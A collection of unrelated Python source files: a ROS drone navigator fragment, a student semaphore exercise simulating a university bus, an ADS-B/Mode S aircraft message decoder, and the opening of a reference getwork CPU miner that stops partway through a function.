for p in pc2.read_points(msg, field_names=("x", "y", "z"), skip_nans=True):
#print " x : %f y: %f z: %f" % (p[0], p[1], p[2])
point = self.dg.continuous_to_discrete((p[0],p[1],p[2]))
#print ('point:',point)
obs_set.add(point)
acquired = self.obstacle_set_mutex.acquire(True) # blocking.
if acquired:
#print('octomap updated!')
self.driver.set_obstacle_set(obs_set)
self.obstacle_set_mutex.release()
return
else:
print ('Lock not acquired!')
def local_pose_callback(self, msg):
pose_ = msg.pose.position #TODO:do fusion with visual slam.
self.local_pose = self.dg.continuous_to_discrete((pose_.x,pose_.y,pose_.z))
#print ('local_pose set!!!')
def get_local_pose(self): # in mavros axis.for command.
#print ('self.local_pose',self.local_pose)
return self.local_pose
def get_current_pose(self): # current pose:slam pose(in world axis)
return self.get_local_pose() # TODO:do transform T1 ^-1 * T2.
'''
helper functions
'''
def set_status(self, status):
self.STATUS = String(status.name)
'''
def reachTargetPosition(self, target, threshold = 0.1):
delta_x = math.fabs(self.local_pose.pose.position.x - target.pos_sp[0])
delta_y = math.fabs(self.local_pose.pose.position.y - target.pos_sp[1])
delta_z = math.fabs(self.local_pose.pose.position.z - target.pos_sp[2])
distance = (delta_x + delta_y + delta_z)
print("distance: ", distance, "threshold: ", threshold)
if distance < threshold:
return True
else:
return False
'''
def setMavMode(self, msg):
pass
if __name__ == '__main__':
nav = Navigator()
nav.set_target_postion((20, 0, 2))
nav.keep_navigating()
|
Pumabus_Paw_Luis.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#Hecho por Brenda Paola Lara Moreno | Luis Arvizu
#Sistop-2019-2| FI-UNAM |
#Ejercicio Implementado: Pumabus
#Lenguaje: Python
#Este trabajo se desarrollo en la version 2.7.10
#Para ejecutarlo requiere de Python, y ejecutarlo desde la terminal posisionandose en
#el directorio donde se encuentre guardado el archivo y
#posteriormente ejecutarlo de la sig manera ----> python PumabusiPaw_Luis.py
import time
import threading
global minutos
global personas
minutos = 0 #contador para los minutos pasados
personas = 0 #contador para el numero de personas en la fila
# Se declaran variables para minimizar el codigo y solo utilizar llamadas de los mensajes a mostras
llegada = 'Llega un '
pumaInactivo = ' Pumabus Estacionado\n'
total = 'Total de '
arrancaPumabus = 'Encendiendo Pumabus...'
mutex = threading.Semaphore(1)
pumaBus = threading.Semaphore(0)
#se declaran funciones
def Recorrido(): #Inicia recorrido de ruta 1
print '»------(¯` Inicia Recorrido ´¯)------»'
time.sleep(2)
print '*'
print '*'
print '*'
print '*'
print '»------(¯` Termina Recorrido ´¯)------»'
def Personas():
global personas
mutex.acquire()
personas += 1 #Añade a las personas que van formandose en la fila
print (llegada + 'Persona') + '\n' + (total) + 'Personas = %d' %(personas)
if personas == 15: #Si son 15 personas sale el pumabus
pumaBus.release()
mutex.release()
def Minutos():
global minutos
mutex.acquire()
minutos += 1 #añade a los "minutos" que van pasando
print 'Ha pasado un minuto' + '\n' + (total) + 'Minutos = %d' %(minutos)
if minutos == 25: #Si pasan 25 min sale el pumabus
pumaBus.release()
mutex.release()
def PumaBus():
global minutos
global personas
while True:
pumaBus.acquire()
print (arrancaPumabus)
mutex.acquire()
if minutos == 25: #Si pasan 25 min. sale el pumabus
print (arrancaPumabus)
Recorrido()
minutos -= 25 #Vacia el contador de minutos
personas -= personas
elif personas >= 15:
Recorrido()
personas -= 15 #se vacia el contador de las personas que se fueron en el pumabus
print (pumaInactivo)
mutex.release()
#Definen los tiempos que tardara cada hilo
threading.Thread(target = PumaBus, args = []).start()
while True:
threading.Thread(target = Personas, args = []).start()
time.sleep(0.5)
threading.Thread(target = Minutos, args = []).start()
time.sleep(0.5)
|
decode.py
|
# fmt: off
import logging
import os
import signal
import socket
import threading
from collections import UserDict
from datetime import datetime, timedelta, timezone
from operator import itemgetter
from pathlib import Path
from typing import (
Any, Callable, Dict, Iterable, Iterator,
List, Optional, TextIO, Tuple, Union
)
import pandas as pd
import pyModeS as pms
from tqdm.autonotebook import tqdm
from ...core import Flight, Traffic
from ...data.basic.airports import Airport
# fmt: on
def next_msg(chunk_it: Iterator[bytes]) -> Iterator[bytes]:
data = b""
for chunk in chunk_it:
data += chunk
while len(data) >= 23:
it = data.find(0x1A)
if it < 0:
break
data = data[it:]
if len(data) < 23:
break
if data[1] == 0x33:
yield data[:23]
data = data[23:]
continue
elif data[1] == 0x32:
data = data[16:]
continue
elif data[1] == 0x31:
data = data[11:]
continue
elif data[1] == 0x34:
data = data[23:]
continue
else:
data = data[1:]
def decode_time_default(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
return datetime.now(timezone.utc)
def decode_time_radarcape(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
now = datetime.now(timezone.utc)
if time_0 is not None:
now = time_0
timestamp = int(msg[4:16], 16)
nanos = timestamp & 0x00003FFFFFFF
secs = timestamp >> 30
now = now.replace(hour=0, minute=0, second=0, microsecond=0)
now += timedelta(seconds=secs, microseconds=nanos / 1000)
return now
def decode_time_dump1090(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
now = datetime.now(timezone.utc)
if time_0 is not None:
now = time_0
else:
now = now.replace(hour=0, minute=0, second=0, microsecond=0)
timestamp = int(msg[4:16], 16)
# dump1090/net_io.c => time (in 12Mhz ticks)
now += timedelta(seconds=timestamp / 12e6)
return now
decode_time: Dict[str, Callable[[str, Optional[datetime]], datetime]] = {
"radarcape": decode_time_radarcape,
"dump1090": decode_time_dump1090,
"default": decode_time_default,
}
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the to_be_stopped() condition."""
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.daemon = True # is it redundant?
self._stop_event = threading.Event()
def stop(self) -> None:
self._stop_event.set()
def to_be_stopped(self) -> bool:
return self._stop_event.is_set()
class Aircraft(object):
def __init__(self, icao24: str, lat0: float, lon0: float) -> None:
self.icao24 = icao24
self._callsign: Optional[str] = None
self._flight: Optional[Flight] = None
self.cumul: List[Dict] = []
self.t0: Optional[datetime] = None
self.t1: Optional[datetime] = None
self.tpos: Optional[datetime] = None
self.m0: Optional[str] = None
self.m1: Optional[str] = None
self.lat: Optional[float] = None
self.lon: Optional[float] = None
self.alt: Optional[float] = None
self.trk: Optional[float] = None
self.spd: Optional[float] = None
self.lat0: float = lat0
self.lon0: float = lon0
self.version: Optional[int] = None
self.nic_a: Optional[int] = None
self.nic_bc: Optional[int] = None
self.nic_s: Optional[int] = None
self.lock = threading.Lock()
@property
def flight(self) -> Optional[Flight]:
with self.lock: # access then clear not thread-safe, hence the lock
df = pd.DataFrame.from_records(self.cumul)
self.cumul.clear()
if self._flight is not None:
df = pd.concat([self._flight.data, df], sort=False)
if self.version is not None:
# remove columns added by nuc_p, nuc_r
if "HPL" in df.columns:
df = df.drop(columns=["HPL", "RCu", "RCv"])
if "HVE" in df.columns:
df = df.drop(columns=["HVE", "VVE"])
if len(df) == 0:
return None
self._flight = Flight(
df.assign(
callsign=df.callsign.replace("", None)
.fillna(method="ffill")
.fillna(method="bfill")
)
)
return self._flight
@property
def callsign(self):
return self._callsign
@callsign.setter
def callsign(self, args):
t, msg = args
callsign = pms.adsb.callsign(msg).strip("_")
if callsign == "":
return
self._callsign = callsign
with self.lock:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, callsign=self._callsign)
)
@property
def speed(self):
pass
@speed.setter
def speed(self, args):
t, msg = args
vdata = pms.adsb.velocity(msg)
if vdata is None:
return
spd, trk, roc, tag = vdata
if tag != "GS":
# does it ever happen...
return
if (spd is None) or (trk is None):
return
self.spd = spd
self.trk = trk
delta = pms.adsb.altitude_diff(msg)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
groundspeed=spd,
track=trk,
vertical_rate=roc,
)
)
if delta is not None and self.alt is not None:
self.cumul[-1]["geoaltitude"] = self.alt + delta
@property
def position(self):
pass
@position.setter
def position(self, args):
t, msg = args
oe = pms.adsb.oe_flag(msg)
setattr(self, "m" + str(oe), msg)
setattr(self, "t" + str(oe), t)
if (
self.t0 is not None
and self.t1 is not None
and abs((self.t0 - self.t1).total_seconds()) < 10
):
latlon = pms.adsb.position(
self.m0, self.m1, self.t0, self.t1, self.lat0, self.lon0
)
else:
latlon = None
if latlon is not None:
self.tpos = t
self.lat, self.lon = latlon
self.alt = pms.adsb.altitude(msg)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
latitude=self.lat,
longitude=self.lon,
altitude=self.alt,
onground=False,
)
)
@property
def surface(self):
pass
@surface.setter
def surface(self, args):
t, msg = args
self.lat, self.lon = pms.adsb.surface_position_with_ref(
msg, self.lat0, self.lon0
)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
latitude=self.lat,
longitude=self.lon,
onground=True,
)
)
@property
def altcode(self):
pass
@altcode.setter
def altcode(self, args):
t, msg = args
self.alt = pms.common.altcode(msg)
with self.lock:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, altitude=self.alt)
)
@property
def idcode(self):
pass
@idcode.setter
def idcode(self, args):
t, msg = args
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
squawk=pms.common.idcode(msg),
)
)
@property
def bds20(self):
pass
@bds20.setter
def bds20(self, args):
t, msg = args
callsign = pms.commb.cs20(msg).strip("_")
if callsign == "":
return
self._callsign = callsign
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(**last_entry, callsign=self._callsign)
else:
self.cumul.append(
dict(
timestamp=t, icao24=self.icao24, callsign=self._callsign
)
)
@property
def bds40(self):
pass
@bds40.setter
def bds40(self, args):
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(
**last_entry,
# FMS selected altitude (ft)
selected_fms=pms.commb.selalt40fms(msg),
# MCP/FCU selected altitude (ft)
selected_mcp=pms.commb.selalt40mcp(msg),
# Barometric pressure (mb)
barometric_setting=pms.commb.p40baro(msg),
)
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# FMS selected altitude (ft)
selected_fms=pms.commb.selalt40fms(msg),
# MCP/FCU selected altitude (ft)
selected_mcp=pms.commb.selalt40mcp(msg),
# Barometric pressure (mb)
barometric_setting=pms.commb.p40baro(msg),
)
)
@property
def bds44(self):
pass
@bds44.setter
def bds44(self, args):
t, msg = args
wind = pms.commb.wind44(msg)
wind = wind if wind is not None else (None, None)
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF 5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(
**last_entry,
# Humidity (%)
humidity=pms.commb.hum44(msg),
# Average static pressure (hPa)
pressure=pms.commb.p44(msg),
# Static air temperature (C)
temperature=pms.commb.temp44(msg),
turbulence=pms.commb.turb44(msg),
# Wind speed (kt) and direction (true) (deg)
windspeed=wind[0],
winddirection=wind[1],
)
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Humidity (%)
humidity=pms.commb.hum44(msg),
# Average static pressure (hPa)
pressure=pms.commb.p44(msg),
# Static air temperature (C)
temperature=pms.commb.temp44(msg),
turbulence=pms.commb.turb44(msg),
# Wind speed (kt) and direction (true) (deg)
windspeed=wind[0],
winddirection=wind[1],
)
)
@property
def bds45(self):
pass
@bds45.setter
def bds45(self, args):
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF 5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(
**last_entry,
# Turbulence level (0-3)
turbulence=pms.commb.turb45(msg),
# Wind shear level (0-3)
wind_shear=pms.commb.ws45(msg),
# Microburst level (0-3)
microburst=pms.commb.mb45(msg),
# Icing level (0-3)
icing=pms.commb.ic45(msg),
# Wake vortex level (0-3)
wake_vortex=pms.commb.wv45(msg),
# Static air temperature (C)
temperature=pms.commb.temp45(msg),
# Average static pressure (hPa)
pressure=pms.commb.p45(msg),
# Radio height (ft)
radio_height=pms.commb.rh45(msg),
)
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Turbulence level (0-3)
turbulence=pms.commb.turb45(msg),
# Wind shear level (0-3)
wind_shear=pms.commb.ws45(msg),
# Microburst level (0-3)
microburst=pms.commb.mb45(msg),
# Icing level (0-3)
icing=pms.commb.ic45(msg),
# Wake vortex level (0-3)
wake_vortex=pms.commb.wv45(msg),
# Static air temperature (C)
temperature=pms.commb.temp45(msg),
# Average static pressure (hPa)
pressure=pms.commb.p45(msg),
# Radio height (ft)
radio_height=pms.commb.rh45(msg),
)
)
@property
def bds50(self):
pass
@bds50.setter
def bds50(self, args):
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(
**last_entry,
# Ground speed (kt)
groundspeed=pms.commb.gs50(msg),
# Roll angle (deg)
roll=pms.commb.roll50(msg),
# True airspeed (kt)
TAS=pms.commb.tas50(msg),
# True track angle (deg)
track=pms.commb.trk50(msg),
# Track angle rate (deg/sec)
track_rate=pms.commb.rtrk50(msg),
)
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Ground speed (kt)
groundspeed=pms.commb.gs50(msg),
# Roll angle (deg)
roll=pms.commb.roll50(msg),
# True airspeed (kt)
TAS=pms.commb.tas50(msg),
# True track angle (deg)
track=pms.commb.trk50(msg),
# Track angle rate (deg/sec)
track_rate=pms.commb.rtrk50(msg),
)
)
@property
def bds60(self):
pass
@bds60.setter
def bds60(self, args):
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(
**last_entry,
# Indicated airspeed (kt)
IAS=pms.commb.ias60(msg),
# Magnetic heading (deg)
heading=pms.commb.hdg60(msg),
# Mach number (-)
Mach=pms.commb.mach60(msg),
# Barometric altitude rate (ft/min)
vertical_rate_barometric=pms.commb.vr60baro(msg),
# Inertial vertical speed (ft/min)
vertical_rate_inertial=pms.commb.vr60ins(msg),
)
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Indicated airspeed (kt)
IAS=pms.commb.ias60(msg),
# Magnetic heading (deg)
heading=pms.commb.hdg60(msg),
# Mach number (-)
Mach=pms.commb.mach60(msg),
# Barometric altitude rate (ft/min)
vertical_rate_barometric=pms.commb.vr60baro(msg),
# Inertial vertical speed (ft/min)
vertical_rate_inertial=pms.commb.vr60ins(msg),
)
)
@property
def nuc_p(self):
pass
@nuc_p.setter
def nuc_p(self, args):
t, msg = args
with self.lock:
hpl, rcu, rcv = pms.adsb.nuc_p(msg)
current = dict(
# Horizontal Protection Limit
HPL=hpl,
# 95% Containment Radius on horizontal position error
RCu=rcu,
# 95% Containment Radius on vertical position error
RCv=rcv,
)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def nic_v1(self):
pass
@nic_v1.setter
def nic_v1(self, args):
t, msg = args
if self.nic_s is None:
return
with self.lock:
hcr, vpl = pms.adsb.nic_v1(msg, self.nic_s)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Containment Radius
HCR=hcr,
# Vertical Protection Limit
VPL=vpl,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def nic_v2(self):
pass
@nic_v2.setter
def nic_v2(self, args):
t, msg = args
if self.nic_a is None or self.nic_bc is None:
return
with self.lock:
hcr = pms.adsb.nic_v2(msg, self.nic_a, self.nic_bc)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Containment Radius
HCR=hcr
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def nuc_r(self):
pass
@nuc_r.setter
def nuc_r(self, args):
t, msg = args
with self.lock:
hve, vve = pms.adsb.nuc_v(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Velocity Error
HVE=hve,
# Vertical Velocity Error
VVE=vve,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def nac_v(self):
pass
@nac_v.setter
def nac_v(self, args):
t, msg = args
with self.lock:
hfm, vfm = pms.adsb.nac_v(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Figure of Merit for rate (GNSS)
HFM=hfm,
# Vertical Figure of Merit for rate (GNSS)
VFM=vfm,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def nac_p(self):
pass
@nac_p.setter
def nac_p(self, args):
t, msg = args
with self.lock:
epu, vepu = pms.adsb.nac_p(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Estimated Position Uncertainty
EPU=epu,
# Vertical Estimated Position Uncertainty
VEPU=vepu,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def sil(self):
pass
@sil.setter
def sil(self, args):
t, msg = args
with self.lock:
phcr, pvpl, base = pms.adsb.sil(msg, self.version)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
version=self.version,
# Probability exceeding Horizontal Containment Radius
pHCR=phcr,
# Probability exceeding Vertical Protection Limit
pVPL=pvpl,
sil_base=base,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
class AircraftDict(UserDict):
lat0: float
lon0: float
def __missing__(self, key):
self[key] = value = Aircraft(key, self.lat0, self.lon0)
return value
def set_latlon(self, lat0, lon0):
self.lat0 = lat0
self.lon0 = lon0
for ac in self.values():
ac.lat0 = lat0
ac.lon0 = lon0
class Decoder:
thread: Optional[StoppableThread]
def __init__(
self, reference: Union[None, str, Airport, Tuple[float, float]] = None
) -> None:
if isinstance(reference, str):
from ...data import airports
reference = airports[reference]
if reference is None:
logging.warning(
"No valid reference position provided. Fallback to (0, 0)"
)
lat0, lon0 = 0.0, 0.0
elif isinstance(reference, Airport):
lat0, lon0 = reference.latlon
else:
lat0, lon0 = reference
self.acs: AircraftDict = AircraftDict()
self.acs.set_latlon(lat0, lon0)
self.thread = None
@classmethod
def from_file(
cls,
filename: Union[str, Path],
reference: Union[str, Airport, Tuple[float, float]],
uncertainty: bool = False,
) -> "Decoder":
if isinstance(filename, str):
filename = Path(filename)
with filename.open("r") as fh:
all_lines = fh.readlines()
decoder = cls(reference)
decoder.process_msgs(
list(
(
datetime.fromtimestamp(
float(line.strip().split(",")[0]), timezone.utc
),
line.strip().split(",")[1][18:].encode(),
)
for line in all_lines
),
uncertainty=uncertainty,
)
return decoder
@classmethod
def from_binary(
cls,
filename: Union[str, Path],
reference: Union[str, Airport, Tuple[float, float]],
*,
uncertainty: bool = False,
time_fmt: str = "dump1090",
time_0: Optional[datetime] = None,
redefine_mag: int = 10,
fh: Optional[TextIO] = None,
):
decoder = cls(reference)
redefine_freq = 2 ** redefine_mag - 1
decode_time_here = decode_time.get(time_fmt, decode_time_default)
def next_in_binary(filename: Union[str, Path]) -> Iterator[bytes]:
with Path(filename).open("rb") as fh:
while True:
get = fh.read()
if len(get) == 0:
return
yield get
for i, bin_msg in tqdm(enumerate(next_msg(next_in_binary(filename)))):
if len(bin_msg) < 23:
continue
msg = "".join(["{:02x}".format(t) for t in bin_msg])
now = decode_time_here(msg, time_0)
if fh is not None:
fh.write("{},{}\n".format(now.timestamp(), msg))
if i & redefine_freq == redefine_freq:
decoder.redefine_reference(now)
decoder.process(now, msg[18:].encode(), uncertainty=uncertainty)
return decoder
@classmethod
def from_rtlsdr(
cls,
reference: Union[str, Airport, Tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_dump1090.csv",
uncertainty: bool = False,
) -> "Decoder": # coverage: ignore
from .rtlsdr import MyRtlReader
decoder = cls(reference)
# dump file
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
fh = open(today, "a", 1)
rtlsdr = MyRtlReader(decoder, fh, uncertainty=uncertainty)
decoder.thread = StoppableThread(target=rtlsdr.run)
signal.signal(signal.SIGINT, rtlsdr.stop)
decoder.thread.start()
return decoder
@classmethod
def from_socket(
cls,
socket: socket.socket,
reference: Union[str, Airport, Tuple[float, float]],
*,
uncertainty: bool,
time_fmt: str = "default",
time_0: Optional[datetime] = None,
redefine_mag: int = 7,
fh: Optional[TextIO] = None,
) -> "Decoder": # coverage: ignore
decoder = cls(reference)
redefine_freq = 2 ** redefine_mag - 1
decode_time_here = decode_time.get(time_fmt, decode_time_default)
def next_in_socket() -> Iterator[bytes]:
while True:
if decoder.thread is None or decoder.thread.to_be_stopped():
socket.close()
return
yield socket.recv(2048)
def decode():
for i, bin_msg in enumerate(next_msg(next_in_socket())):
msg = "".join(["{:02x}".format(t) for t in bin_msg])
# Timestamp decoding
now = decode_time_here(msg, time_0)
if fh is not None:
fh.write("{},{}\n".format(now.timestamp(), msg))
if len(bin_msg) < 23:
continue
if (
time_fmt != "radarcape"
and i & redefine_freq == redefine_freq
):
decoder.redefine_reference(now)
decoder.process(now, msg[18:].encode(), uncertainty=uncertainty)
decoder.thread = StoppableThread(target=decode)
decoder.thread.start()
return decoder
def stop(self):
if self.thread is not None and self.thread.is_alive():
self.thread.stop()
self.thread.join()
def __del__(self):
self.stop()
@classmethod
def from_dump1090(
cls,
reference: Union[str, Airport, Tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_dump1090.csv",
uncertainty: bool = False,
) -> "Decoder": # coverage: ignore
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 30005))
fh = open(today, "a", 1)
return cls.from_socket(
s,
reference,
uncertainty=uncertainty,
time_fmt="dump1090",
time_0=now,
fh=fh,
)
@classmethod
def from_address(
cls,
host: str,
port: int,
reference: Union[str, Airport, Tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_tcp.csv",
uncertainty: bool = False,
) -> "Decoder": # coverage: ignore
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
fh = open(today, "a", 1)
return cls.from_socket(
s, reference, uncertainty=uncertainty, time_fmt="radarcape", fh=fh
)
def redefine_reference(self, time: datetime) -> None:
pos = list(
(ac.lat, ac.lon)
for ac in self.acs.values()
if ac.alt is not None
and ac.alt < 5000
and ac.tpos is not None
and (time - ac.tpos).total_seconds() < 20 * 60
)
n = len(pos)
if n > 0:
self.acs.set_latlon(
sum(a[0] for a in pos) / n, sum(a[1] for a in pos) / n
)
def process_msgs(
self, msgs: Iterable[Tuple[datetime, bytes]], uncertainty: bool = False
) -> None:
for i, (time, msg) in tqdm(enumerate(msgs), total=sum(1 for _ in msgs)):
if i & 127 == 127:
self.redefine_reference(time)
self.process(time, msg, uncertainty=uncertainty)
def process(
self,
time: datetime,
msg: bytes,
*args,
uncertainty: bool = False,
spd: Optional[float] = None,
trk: Optional[float] = None,
alt: Optional[float] = None,
) -> None:
ac: Aircraft
if len(msg) != 28:
return
df = pms.df(msg)
if df == 4 or df == 20:
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
ac.altcode = time, msg
if df == 5 or df == 21:
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
ac.idcode = time, msg
if df == 17 or df == 18: # ADS-B
if pms.crc(msg, encode=False) != 0:
return
tc = pms.adsb.typecode(msg)
icao = pms.icao(msg)
# before it's fixed in pyModeS release...
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
if 1 <= tc <= 4:
ac.callsign = time, msg
if 5 <= tc <= 8:
ac.surface = time, msg
if tc == 19:
ac.speed = time, msg
if 9 <= tc <= 18:
# This is barometric altitude
ac.position = time, msg
if 20 <= tc <= 22:
# Only GNSS altitude
pass
if not uncertainty:
return
if 9 <= tc <= 18:
ac.nic_bc = pms.adsb.nic_b(msg)
if (5 <= tc <= 8) or (9 <= tc <= 18) or (20 <= tc <= 22):
ac.nuc_p = time, msg
if ac.version == 1:
ac.nic_v1 = time, msg
elif ac.version == 2:
ac.nic_v2 = time, msg
if tc == 19:
ac.nuc_r = time, msg
if ac.version in [1, 2]:
ac.nac_v = time, msg
if tc == 29:
ac.sil = time, msg
ac.nac_p = time, msg
if tc == 31:
ac.version = pms.adsb.version(msg)
ac.sil = time, msg
ac.nac_p = time, msg
if ac.version == 1:
ac.nic_s = pms.adsb.nic_s(msg)
elif ac.version == 2:
ac.nic_a, ac.nic_bc = pms.adsb.nic_a_c(msg)
elif df == 20 or df == 21:
bds = pms.bds.infer(msg)
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
if bds == "BDS20":
ac.bds20 = time, msg
return
if bds == "BDS40":
ac.bds40 = time, msg
return
if bds == "BDS44":
ac.bds44 = time, msg
return
if bds == "BDS45":
ac.bds45 = time, msg
return
if bds == "BDS50,BDS60":
if spd is not None and trk is not None and alt is not None:
bds = pms.bds.is50or60(msg, spd, trk, alt)
elif (
ac.spd is not None
and ac.trk is not None
and ac.alt is not None
):
bds = pms.bds.is50or60(msg, ac.spd, ac.trk, ac.alt)
else:
return
# do not return!
if bds == "BDS50":
ac.bds50 = time, msg
return
if bds == "BDS60":
ac.bds60 = time, msg
return
@property
def aircraft(self) -> List[Dict[str, Any]]:
return sorted(
(
dict(
icao24=key,
callsign=ac.callsign,
length=(
(len(ac.cumul) + len(ac._flight))
if ac._flight is not None
else len(ac.cumul)
),
position=ac.lat is not None,
data=ac,
)
for (key, ac) in self.acs.items()
if ac.callsign is not None
),
key=itemgetter("length"),
reverse=True,
)
@property
def traffic(self) -> Optional[Traffic]:
try:
return Traffic.from_flights(
self[elt["icao24"]] for elt in self.aircraft
)
except ValueError:
return None
def __getitem__(self, icao: str) -> Optional[Flight]:
return self.acs[icao].flight
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The EvolveChain developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class EvolveChainRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
